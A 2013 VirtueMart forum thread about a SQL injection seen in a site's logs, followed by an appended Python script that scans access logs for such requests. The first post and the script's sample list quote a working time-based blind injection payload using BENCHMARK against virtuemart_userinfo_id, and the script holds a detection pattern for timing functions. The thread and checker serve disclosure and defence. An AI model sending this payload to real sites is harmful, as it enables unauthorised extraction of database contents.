VirtueMart Forum

VirtueMart 2 + 3 + 4 => Security (https) / Performance / SEO, SEF, URLs => Topic started by: Arkadiy on October 03, 2013, 05:10:27 AM

Title: SQL injection
Post by: Arkadiy on October 03, 2013, 05:10:27 AM
On one of my sites using the SQL injection was considered users. The injection took place in such a query:
GET /index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=1%22and(IF(ASCII(SUBSTRING((SELECT%20Database()),2,1))=112,BENCHMARK(51544503,MD5(1)),1))and%221%22=%221 HTTP/1.0
Title: Re: SQL injection
Post by: AH on October 03, 2013, 09:31:28 AM
Version of VM?
Title: Re: SQL injection
Post by: alatak on October 04, 2013, 08:53:24 AM
Hello

This issue is fixed in vm2.0.22c
Title: Re: SQL injection
Post by: AH on October 04, 2013, 09:42:04 AM
Thanks Alatak
Title: Re: SQL injection
Post by: Arkadiy on October 04, 2013, 20:16:50 PM
Good.
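
Added example, not part of the original thread or of VirtueMart's code: a log check that flags requests like the one in the first post, where virtuemart_userinfo_id carries anything other than digits or a timing function such as BENCHMARK. The function and constant names and the second (benign) sample line are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters expected to hold only a numeric ID (assumption for this example).
NUMERIC_PARAMS = {"virtuemart_userinfo_id"}
# Functions typical of time-based blind SQL injection probes.
TIMING_RE = re.compile(r"\b(benchmark|sleep)\s*\(", re.IGNORECASE)
REQUEST_RE = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d$")

def inspect_request(request_line):
    """Return a list of findings for one HTTP request line (empty if clean)."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return ["unparseable request line"]
    # parse_qs percent-decodes values, so %22 and %20 become '"' and ' '.
    params = parse_qs(urlsplit(m.group(2)).query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for value in values:
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.append(f"{name}: non-numeric value")
            if TIMING_RE.search(value):
                findings.append(f"{name}: timing function in value")
    return findings

SAMPLES = [
    # Request line quoted in the first post of this thread.
    "GET /index.php?option=com_virtuemart&view=user&task=removeAddressST"
    "&virtuemart_userinfo_id=1%22and(IF(ASCII(SUBSTRING((SELECT%20Database()),2,1))"
    "=112,BENCHMARK(51544503,MD5(1)),1))and%221%22=%221 HTTP/1.0",
    # Constructed benign request for comparison.
    "GET /index.php?option=com_virtuemart&view=user&task=removeAddressST"
    "&virtuemart_userinfo_id=17 HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        result = inspect_request(line)
        print("FLAG " if result else "ok   ", result)
```

This only surfaces attempts in access logs; the fix named in the thread is the update to vm2.0.22c.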